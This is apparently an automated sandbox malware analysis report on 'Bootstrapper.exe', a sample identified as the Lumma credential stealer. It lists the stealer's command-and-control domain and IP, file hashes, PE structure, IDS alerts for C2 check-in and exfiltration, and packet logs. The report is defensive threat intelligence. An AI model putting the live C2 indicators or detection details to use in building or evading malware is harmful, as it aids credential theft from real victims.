https://ac.ecosia.org/autocomplete?q=	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	Bootstrapper.exe, 00000000.00000003.2480408350.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542183381.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dxkushha.com/Z	Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Bootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Bootstrapper.exe, 00000000.00000003.2394578963.0000000002963000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dxkushha.com/apimpQ	Bootstrapper.exe, 00000000.00000003.2446824381.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446910419.000000000291F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dxkushha.com/D	Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dxkushha.com/	Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2551636305.000000000290B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Bootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dxkushha.com/L	Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	dxkushha.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581127
Start date and time:	2024-12-27 03:34:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Bootstrapper.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 69% Number of executed functions: 9 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63, 20.190.147.5, 20.223.36.55, 2.16.158.56
Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:36:10	API Interceptor	8x Sleep call for process: Bootstrapper.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.192
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.218.163
	http://kxyaiaqyijjz.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://pdf-ezy.com/pdf-ez.exe	Get hash	malicious	Unknown	Browse	172.67.152.3
	b8ygJBG5cb.msi	Get hash	malicious	Unknown	Browse	172.67.194.29
	tBnELFfQoe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.49.159
	phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	172.67.214.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	atw3.dll	Get hash	malicious	Gozi, Ursnif	Browse	104.21.80.1
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	104.21.80.1
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	104.21.80.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.998151135230971
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Bootstrapper.exe
File size:	1'003'520 bytes
MD5:	ff6c56326f0ee63ca9360576a7449ff5
SHA1:	0ee6aa098523f43dcd93dedaab26b7a13f37aec7
SHA256:	aafa6952bb4c20240c67300a13ca97756ac5907f2abfbad9b76a6377605e3bf4
SHA512:	631308c7104f958d8a36e9eb01a7c00c35e2092055301cca89c2669b3b3ee141129e7ff7838fb4c6d2af20fd1f3b6e57035f74805c2e02d4ed68c4b4ac7583d0
SSDEEP:	12288:uN0UPY5+8dUs8QPVXFtx0MSw/omm+ryTvAWZvDNw2XaOvvd8tuKBSympkM+d55YK:a7MKQdXzx0ORmPNw0auqSzKMjC
TLSH:	00258D3693B19012F8A319B44A9762F2943CB6B0479447D363C85DFED0B1AD8ED34B6B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v..\.j.\.j.\.j...i.Q.j...o...j...n.O.j..bo.z.j..bn.L.j..bi.N.j...k.Y.j.\.k...j..bb.].j..b..].j..bh.].j.Rich\.j................

File Icon


Icon Hash:	b1b0b0b08888b0a2

Static PE Info

General

Entrypoint:	0x45bd30
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x676D9F40 [Thu Dec 26 18:24:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	c7c33d78106fb52cd60f8764c9330a24

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
call 00007F0E2CF8092Dh
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0048D03Ch]
mov eax, dword ptr [ebp+08h]
push eax
call dword ptr [0048D038h]
push C0000409h
call dword ptr [0048D004h]
push eax
call dword ptr [0048D040h]
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0048D044h]
test eax, eax
je 00007F0E2CF80C29h
mov ecx, 00000002h
int 29h
mov dword ptr [004E9068h], eax
mov dword ptr [004E9064h], ecx
mov dword ptr [004E9060h], edx
mov dword ptr [004E905Ch], ebx
mov dword ptr [004E9058h], esi
mov dword ptr [004E9054h], edi
mov word ptr [004E9080h], ss
mov word ptr [004E9074h], cs
mov word ptr [004E9050h], ds
mov word ptr [004E904Ch], es
mov word ptr [004E9048h], fs
mov word ptr [004E9044h], gs
pushfd
pop dword ptr [004E9078h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004E906Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004E9070h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004E907Ch], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9bb4c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xec000	0x4fbd	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf1000	0x855c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9ab1c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9ab70	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8be0a	0x8c000	74a6fcd0570c1e7364e2888f5b1f8c01	False	0.48225795200892857	data	6.2834396092325155	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0xf274	0xf400	bca10ccbf59dceb3893b02613b0a2ae0	False	0.3246029713114754	data	4.587269976868019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9d000	0x4d0b0	0x4c000	8a15a0113824fea51a6b990ae465694f	False	0.6649105674342105	data	7.5113353136640955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fptable	0xeb000	0x80	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xec000	0x4fbd	0x5000	cbf820a7a4d3b2be31ce063858d8306e	False	0.57578125	data	5.282926026573821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf1000	0x855c	0x8600	2bdc0e00b7b6acc1bd3c435665a46cfe	False	0.7974871735074627	data	6.810678524311397	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xec3a0	0x183e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.8991298743151789
RT_MENU	0xedbe0	0x2ae	data			0.5408163265306123
RT_MENU	0xede90	0x472	data			0.5263620386643234
RT_DIALOG	0xee304	0x470	data			0.4920774647887324
RT_DIALOG	0xee774	0x384	data			0.5422222222222223
RT_DIALOG	0xeeaf8	0x2fc	data			0.574607329842932
RT_DIALOG	0xeedf4	0x410	data			0.5201923076923077
RT_DIALOG	0xef204	0x584	data			0.476628895184136
RT_DIALOG	0xef788	0x5ac	data			0.5130853994490359
RT_DIALOG	0xefd34	0x37c	data			0.5269058295964125
RT_DIALOG	0xf00b0	0x2d8	data			0.5576923076923077
RT_DIALOG	0xf0388	0x3a8	data			0.5576923076923077
RT_DIALOG	0xf0730	0x3c4	data			0.5238589211618258
RT_GROUP_ICON	0xf0af4	0x14	data			1.05
RT_VERSION	0xf0b08	0x338	data	English	United States	0.4963592233009709
RT_MANIFEST	0xf0e40	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualProtect, GetCurrentProcess, GetStdHandle, WriteFile, CreateFileW, GetCurrentThreadId, GetModuleHandleA, GetLastError, GetCurrentThread, GetCurrentProcessId, GetProcessHeap, GetModuleHandleW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle

USER32.dll

MessageBoxA, MessageBoxW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T03:36:10.657013+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49753	104.21.80.1	443	TCP
2024-12-27T03:36:11.439483+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49753	104.21.80.1	443	TCP
2024-12-27T03:36:11.439483+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49753	104.21.80.1	443	TCP
2024-12-27T03:36:12.842618+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49759	104.21.80.1	443	TCP
2024-12-27T03:36:13.648154+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49759	104.21.80.1	443	TCP
2024-12-27T03:36:13.648154+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49759	104.21.80.1	443	TCP
2024-12-27T03:36:15.209779+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49766	104.21.80.1	443	TCP
2024-12-27T03:36:16.902979+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49766	104.21.80.1	443	TCP
2024-12-27T03:36:18.283975+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49775	104.21.80.1	443	TCP
2024-12-27T03:36:20.791685+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49782	104.21.80.1	443	TCP
2024-12-27T03:36:23.820777+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49788	104.21.80.1	443	TCP
2024-12-27T03:36:26.074730+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49794	104.21.80.1	443	TCP
2024-12-27T03:36:28.695448+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49801	104.21.80.1	443	TCP
2024-12-27T03:36:29.471988+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49801	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 03:36:09.274281979 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:09.274317980 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:09.274388075 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:09.277354956 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:09.277368069 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:10.656869888 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:10.657012939 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:10.658483982 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:10.658492088 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:10.658720016 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:10.704179049 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:10.704209089 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:10.704250097 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:11.439507008 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:11.439620018 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:11.439707041 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:11.442007065 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:11.442022085 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:11.442033052 CET	49753	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:11.442038059 CET	443	49753	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:11.457165003 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:11.457194090 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:11.457350969 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:11.457520008 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:11.457534075 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:12.842557907 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:12.842617989 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:12.843821049 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:12.843827963 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:12.844022036 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:12.845223904 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:12.845242023 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:12.845274925 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.648164034 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.648241043 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.648276091 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.648289919 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.648300886 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.648441076 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.648446083 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.656621933 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.656677008 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.656682014 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.671962976 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.672005892 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.672010899 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.722589970 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.722595930 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.767792940 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.767976999 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.767982006 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.816338062 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.849147081 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.849278927 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.849368095 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.849632025 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.849642038 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.849653006 CET	49759	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.849657059 CET	443	49759	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.996978998 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.997024059 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:13.997085094 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.997375011 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:13.997386932 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:15.209585905 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:15.209779024 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:15.210834980 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:15.210864067 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:15.211082935 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:15.216058016 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:15.216201067 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:15.216243029 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:15.216315985 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:15.216332912 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:16.902982950 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:16.903063059 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:16.903100014 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:16.903244972 CET	49766	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:16.903253078 CET	443	49766	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:16.982728958 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:16.982760906 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:16.982827902 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:16.983046055 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:16.983057976 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:18.283776999 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:18.283974886 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:18.285181999 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:18.285192013 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:18.285389900 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:18.286511898 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:18.286644936 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:18.286673069 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:19.164381027 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:19.164457083 CET	443	49775	104.21.80.1	192.168.2.4
